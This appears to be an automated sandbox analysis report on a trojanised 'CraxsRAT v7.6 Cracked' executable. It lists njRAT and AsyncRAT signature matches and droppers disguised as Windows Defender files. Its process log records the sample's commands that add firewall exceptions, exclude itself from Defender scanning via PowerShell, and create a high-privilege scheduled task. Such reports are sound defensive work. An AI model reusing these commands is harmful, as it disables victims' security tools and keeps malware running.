Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: Windows Defender Notification.exe.0.dr, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.0.dr, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.0.dr, qOI2DzwDff.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, qOI2DzwDff.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.10.dr, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.10.dr, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.10.dr, qOI2DzwDff.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Windows Defender Notification.exe.0.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	Base64 encoded string: 'z0k3n8d1QlUZGj3/Cw1MZ+Sw+8GjoHfNJw1IRh/u2EpEdamH0Ve2KpMLNwdldO2r'
Source: Windows Defender Notification.exe.0.dr, v9OXbFpunZ.cs	Base64 encoded string: 'vOBBMYMUH8sucMy888qB2DdntvpAdH5URgoTARCBSmHmA8MkkDwATtXXaAq4', 'NxuMXrNpv8NXvjjtOnSScCtqQ8ImvaIcYArBQI5IsuEb0lAFltxuUWw750Fe', 'tul8KtZrrFOs73ToEDoTBGOG4YivFvgqzkMBk0KJeqsq4T4rvZD9BuCdkwQs'
Source: Windows Defender Notification.exe.0.dr, wBRYVJsNSz.cs	Base64 encoded string: 'HtkKqyCCsGWMASdhGkmxdDP3BxUAN6ARue1FetEchV96k6ucc359MjKQZNYu', 'ZGzFiZEYbw8AsAyCrYf5iLnuDKEdHoOuT1wvadV0Q6TsPWGgrnV911YKPsYA', 'GftXmTDBsrj9eCYbvqyANgNa2J2Wabih1I8Pyih7ulxhttw9tco895BrGXAx', 'rqm406mpFaUeteuc2H0ywSCUnJlpAkADtWOsVAINusYpU6j8DIEv8Lm0977Q', 'JN2jWVD6XxE1StJLoqJB7Hy4pGJ9DdLSpjgzAlnawFgbuiVVenyozhHJQgfY', 'IZsk0shZ2ek0hzaUPhkriuJhbMRFXviCw7i25OfNrfge3CGvoAaeZpN314aC'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	Base64 encoded string: 'z0k3n8d1QlUZGj3/Cw1MZ+Sw+8GjoHfNJw1IRh/u2EpEdamH0Ve2KpMLNwdldO2r'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, v9OXbFpunZ.cs	Base64 encoded string: 'vOBBMYMUH8sucMy888qB2DdntvpAdH5URgoTARCBSmHmA8MkkDwATtXXaAq4', 'NxuMXrNpv8NXvjjtOnSScCtqQ8ImvaIcYArBQI5IsuEb0lAFltxuUWw750Fe', 'tul8KtZrrFOs73ToEDoTBGOG4YivFvgqzkMBk0KJeqsq4T4rvZD9BuCdkwQs'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, wBRYVJsNSz.cs	Base64 encoded string: 'HtkKqyCCsGWMASdhGkmxdDP3BxUAN6ARue1FetEchV96k6ucc359MjKQZNYu', 'ZGzFiZEYbw8AsAyCrYf5iLnuDKEdHoOuT1wvadV0Q6TsPWGgrnV911YKPsYA', 'GftXmTDBsrj9eCYbvqyANgNa2J2Wabih1I8Pyih7ulxhttw9tco895BrGXAx', 'rqm406mpFaUeteuc2H0ywSCUnJlpAkADtWOsVAINusYpU6j8DIEv8Lm0977Q', 'JN2jWVD6XxE1StJLoqJB7Hy4pGJ9DdLSpjgzAlnawFgbuiVVenyozhHJQgfY', 'IZsk0shZ2ek0hzaUPhkriuJhbMRFXviCw7i25OfNrfge3CGvoAaeZpN314aC'
Source: Windows Defender Notification.exe.10.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	Base64 encoded string: 'z0k3n8d1QlUZGj3/Cw1MZ+Sw+8GjoHfNJw1IRh/u2EpEdamH0Ve2KpMLNwdldO2r'
Source: Windows Defender Notification.exe.10.dr, v9OXbFpunZ.cs	Base64 encoded string: 'vOBBMYMUH8sucMy888qB2DdntvpAdH5URgoTARCBSmHmA8MkkDwATtXXaAq4', 'NxuMXrNpv8NXvjjtOnSScCtqQ8ImvaIcYArBQI5IsuEb0lAFltxuUWw750Fe', 'tul8KtZrrFOs73ToEDoTBGOG4YivFvgqzkMBk0KJeqsq4T4rvZD9BuCdkwQs'
Source: Windows Defender Notification.exe.10.dr, wBRYVJsNSz.cs	Base64 encoded string: 'HtkKqyCCsGWMASdhGkmxdDP3BxUAN6ARue1FetEchV96k6ucc359MjKQZNYu', 'ZGzFiZEYbw8AsAyCrYf5iLnuDKEdHoOuT1wvadV0Q6TsPWGgrnV911YKPsYA', 'GftXmTDBsrj9eCYbvqyANgNa2J2Wabih1I8Pyih7ulxhttw9tco895BrGXAx', 'rqm406mpFaUeteuc2H0ywSCUnJlpAkADtWOsVAINusYpU6j8DIEv8Lm0977Q', 'JN2jWVD6XxE1StJLoqJB7Hy4pGJ9DdLSpjgzAlnawFgbuiVVenyozhHJQgfY', 'IZsk0shZ2ek0hzaUPhkriuJhbMRFXviCw7i25OfNrfge3CGvoAaeZpN314aC'

Source: Windows Defender Notification.exe.10.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Windows Defender Notification.exe.10.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Windows Defender Notification.exe.0.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Windows Defender Notification.exe.0.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.spre.phis.troj.adwa.spyw.evad.winEXE@30/32@0/1

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 2_2_05970032 AdjustTokenPrivileges,	2_2_05970032
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 2_2_05970006 AdjustTokenPrivileges,	2_2_05970006
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 7_2_015EB1EE AdjustTokenPrivileges,	7_2_015EB1EE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 7_2_015EB1B7 AdjustTokenPrivileges,	7_2_015EB1B7
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 8_2_010FB1EE AdjustTokenPrivileges,	8_2_010FB1EE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 8_2_010FB1B7 AdjustTokenPrivileges,	8_2_010FB1B7
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 11_2_0109B1EE AdjustTokenPrivileges,	11_2_0109B1EE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 11_2_0109B1B7 AdjustTokenPrivileges,	11_2_0109B1B7

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\CraxsRAT v7.6 Cracked.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Mutant created: \Sessions\1\BaseNamedObjects\pqN2WFRab1fxKZOt
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1864
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Mutant created: \Sessions\1\BaseNamedObjects\0e75fed00639ea9e725255499292dcddSGFjS2Vk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: CraxsRAT v7.6 Cracked.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe	ReversingLabs: Detection: 63%
Source: CraxsRAT v7.6 Cracked.exe	Virustotal: Detection: 54%

Source: unknown	Process created: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe "C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe "C:\Users\user\AppData\Local\Temp\CraxsRat.exe"
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" ..
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" ..
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" ..
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1864 -s 800
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe "C:\Users\user\AppData\Local\Temp\CraxsRat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Section loaded: windows.storage.dll	Jump to behavior
